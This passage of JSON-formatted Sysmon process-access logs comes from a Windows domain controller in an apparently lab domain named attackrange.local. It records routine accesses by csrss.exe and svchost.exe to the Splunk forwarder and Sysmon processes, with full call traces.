Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5775,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-036E-5F25-0000-001017DD0A00}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-036E-5F25-0000-001017DD0A00}","TargetProcessId":"5028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5776,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5777,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5778,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5779,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5780,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5781,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5782,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:50.909\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:50.909","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
